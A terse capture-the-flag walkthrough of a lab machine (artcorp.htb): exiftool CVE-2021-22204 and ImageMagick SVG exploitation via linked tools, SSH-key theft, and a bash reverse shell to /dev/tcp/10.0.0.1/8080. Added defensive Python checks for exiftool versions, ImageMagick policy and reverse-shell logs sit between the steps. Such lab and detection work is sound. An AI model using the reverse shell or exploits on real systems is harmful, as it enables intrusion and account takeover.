nmap -sV -sC
No directories found using:
gobuster dir --url artcorp.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 25 > gobuster_dir.txt
https://github.com/hubdotcom/marlon-tools/blob/master/tools/dnsproxy/dnsproxy.py
Found the dev01 subdomain using:
gobuster dns -t 30 -w /usr/share/wordlists/subdomains-top1million-110000.txt -d artcorp.htb
It looks like the service is running exiftool to extract the metadata.
It may be affected by CVE-2021-22204 (exiftool).
Used this tool to create a malicious jpg:
https://github.com/convisolabs/CVE-2021-22204-exiftool
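From the defender's side, the first thing to establish on a service that shells out to exiftool is whether the installed build sits inside the affected range (CVE-2021-22204 affects ExifTool 7.44 through 12.23; 12.24 carries the fix). The example below is added here and is not part of the original notes or of the linked tool; it parses the output of `exiftool -ver` and gates on it. The pitfall it guards against is real: ExifTool versions are two dotted integers, so a naive string comparison ranks "12.9" above "12.23" and would wave a vulnerable build through.

```python
import re
import shutil
import subprocess

# Affected range published for CVE-2021-22204 (the DjVu parsing bug):
# ExifTool 7.44 through 12.23 inclusive; 12.24 is the first fixed release.
FIRST_AFFECTED = (7, 44)
FIRST_FIXED = (12, 24)


def parse_exiftool_version(ver_output: str) -> tuple[int, int]:
    """Turn the text printed by `exiftool -ver` (e.g. "12.23\\n") into (major, minor).

    Comparing integer tuples rather than strings is the point: "12.9" < "12.23"
    numerically, but "12.9" > "12.23" as strings.
    """
    m = re.fullmatch(r"\s*(\d+)\.(\d+)\s*", ver_output)
    if not m:
        raise ValueError(f"unrecognised exiftool version output: {ver_output!r}")
    return int(m.group(1)), int(m.group(2))


def exiftool_affected(ver_output: str) -> bool:
    """True when the reported ExifTool version falls inside the CVE-2021-22204 range."""
    version = parse_exiftool_version(ver_output)
    return FIRST_AFFECTED <= version < FIRST_FIXED


def installed_exiftool_affected(timeout: float = 5.0):
    """Check the exiftool found on PATH; returns None when none is installed.

    The binary is invoked with an argument list (no shell) and a timeout, the
    same way an upload handler should invoke it on untrusted files.
    """
    exe = shutil.which("exiftool")
    if exe is None:
        return None
    result = subprocess.run(
        [exe, "-ver"], capture_output=True, text=True, timeout=timeout, check=True
    )
    return exiftool_affected(result.stdout)


if __name__ == "__main__":
    # Constructed sample outputs, as `exiftool -ver` would print them.
    for sample in ("12.23\n", "12.24\n", "12.9\n"):
        print(sample.strip(), "affected" if exiftool_affected(sample) else "fixed")
    print("installed exiftool affected:", installed_exiftool_affected())
```

Version gating is the primary control; an upload pipeline that must keep an older exiftool should at least run it as an unprivileged user with a timeout, as `installed_exiftool_affected` does for the version probe.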
Now we have access to the machine as the www-data user.
We need to become the thomas user in order to read the user flag.
Let's scan the system's processes to check for any vulnerable services:
https://github.com/DominicBreuker/pspy
Using pspy (unprivileged Linux process snooping):
Upload it to the uploads folder and execute it.
Some of these processes may be vulnerable:
$ mogrify --version
Version: ImageMagick 7.0.10-36 Q16 x86_64 2021-08-29
https://www.exploit-db.com/exploits/39767
Uploaded a malicious svg file which exploits the vulnerability.
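A background job that runs mogrify over user-supplied files is exactly the setup the ImageMagick project's ImageTragick advisory (the issue family behind the exploit-db entry above) addressed with `policy.xml` coder restrictions: deny the EPHEMERAL, URL, HTTPS, MVG and MSL coders, which let an image file fetch or write other files. The checker below is an added example, not code from the original notes or from ImageMagick; it parses a `policy.xml` and reports which of those coders the policy still allows, with a constructed weak policy and a constructed hardened one to compare.

```python
import xml.etree.ElementTree as ET

# Coders the ImageTragick advisory recommended denying outright.
DANGEROUS_CODERS = frozenset({"EPHEMERAL", "URL", "HTTPS", "MVG", "MSL"})


def _patterns(value: str) -> set[str]:
    """Expand a policy pattern such as "MSL" or "{MVG,MSL}" into coder names."""
    value = value.strip().upper()
    if value.startswith("{") and value.endswith("}"):
        return {p.strip() for p in value[1:-1].split(",") if p.strip()}
    return {value}


def coders_still_allowed(policy_xml: str) -> set[str]:
    """Return the dangerous coders that this policy.xml does not deny.

    A coder counts as denied when a <policy> in the "coder" domain (or the
    "module" domain, which ImageMagick 7 also uses) has rights="none" and
    names the coder in its pattern. A pattern of "*" denies every coder.
    """
    root = ET.fromstring(policy_xml)
    denied: set[str] = set()
    for policy in root.iter("policy"):
        domain = policy.get("domain", "").lower()
        rights = policy.get("rights", "").lower()
        if domain not in ("coder", "module") or rights != "none":
            continue
        names = _patterns(policy.get("pattern", ""))
        if "*" in names:
            return set()
        denied |= names
    return set(DANGEROUS_CODERS - denied)


# Constructed sample: a policy that only caps memory and leaves every coder enabled.
WEAK_POLICY = """\
<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
</policymap>
"""

# Constructed sample: the same policy with the recommended coder denies added.
HARDENED_POLICY = """\
<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <!-- ImageTragick mitigations -->
  <policy domain="coder" rights="none" pattern="EPHEMERAL"/>
  <policy domain="coder" rights="none" pattern="URL"/>
  <policy domain="coder" rights="none" pattern="HTTPS"/>
  <policy domain="coder" rights="none" pattern="{MVG,MSL}"/>
</policymap>
"""

if __name__ == "__main__":
    for label, text in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        print(f"{label}: still allowed = {sorted(coders_still_allowed(text))}")
```

Point it at the live file with `coders_still_allowed(open("/etc/ImageMagick-7/policy.xml").read())` (path varies by distribution); a non-empty result on a host that converts uploads is a finding regardless of the ImageMagick version, since the policy is what keeps a crafted SVG or MSL file from reaching the filesystem or the network.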
Now let's get the ssh keys using this vuln so that we can ssh in as thomas.
Let's use this key to log in as thomas.
#### Now we get the root user
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
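The reverse shell above is the kind of command line process-execution logging should catch: bash opens the socket itself through its `/dev/tcp/HOST/PORT` pseudo-path, so no separate network client appears, and an interactive shell with all three standard streams redirected is rarely legitimate outside a terminal. The detector below is an added example, not part of the original notes; it scans constructed log lines in a simplified `user pid command` format (not real auditd output) and extracts the remote endpoint for triage.

```python
import re
from typing import NamedTuple


class Finding(NamedTuple):
    pid: str
    user: str
    remote: str   # "host:port" when the command opened /dev/tcp or /dev/udp, else ""
    reason: str


REASON_DEVTCP = "shell opened /dev/tcp or /dev/udp pseudo-device"
REASON_INTERACTIVE = "interactive shell with stdio redirected"

# bash's /dev/tcp/HOST/PORT and /dev/udp/HOST/PORT pseudo-paths.
DEV_TCP_UDP = re.compile(r"/dev/(?:tcp|udp)/([^/\s]+)/(\d{1,5})")
# sh/bash/zsh/dash run with -i and its output redirected with >& in the same
# command (no pipe or ; between them).
INTERACTIVE_REDIRECT = re.compile(r"\b(?:ba|z|da)?sh\b[^|;]*\s-i\b[^|;]*>&")


def scan_exec_log(log_text: str) -> list[Finding]:
    """Flag reverse-shell-style command lines in a 'user pid command' log."""
    findings: list[Finding] = []
    for line in log_text.splitlines():
        parts = line.split(maxsplit=2)
        if len(parts) < 3:
            continue
        user, pid, cmd = parts
        m = DEV_TCP_UDP.search(cmd)
        if m:
            findings.append(Finding(pid, user, f"{m.group(1)}:{m.group(2)}", REASON_DEVTCP))
        elif INTERACTIVE_REDIRECT.search(cmd):
            findings.append(Finding(pid, user, "", REASON_INTERACTIVE))
    return findings


# Constructed sample log: a routine image-conversion job, the reverse shell
# from the notes above, an ssh login and cron. Paths and pids are made up.
SAMPLE_LOG = """\
www-data 1412 /bin/sh -c mogrify -format png /var/www/uploads/*.jpg
thomas 1450 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
thomas 1463 ssh -i /home/thomas/.ssh/id_rsa thomas@localhost
root 1501 /usr/sbin/cron -f
"""

if __name__ == "__main__":
    for f in scan_exec_log(SAMPLE_LOG):
        print(f"pid {f.pid} ({f.user}): {f.reason}"
              + (f" -> {f.remote}" if f.remote else ""))
```

The `ssh -i` line shows why the interactive-shell rule requires the `>&` redirection as well as `-i`: matching on `-i` alone would flag every key-based ssh login. In a real pipeline the same two patterns apply to auditd `EXECVE` records or EDR process-creation events once the command line has been reassembled.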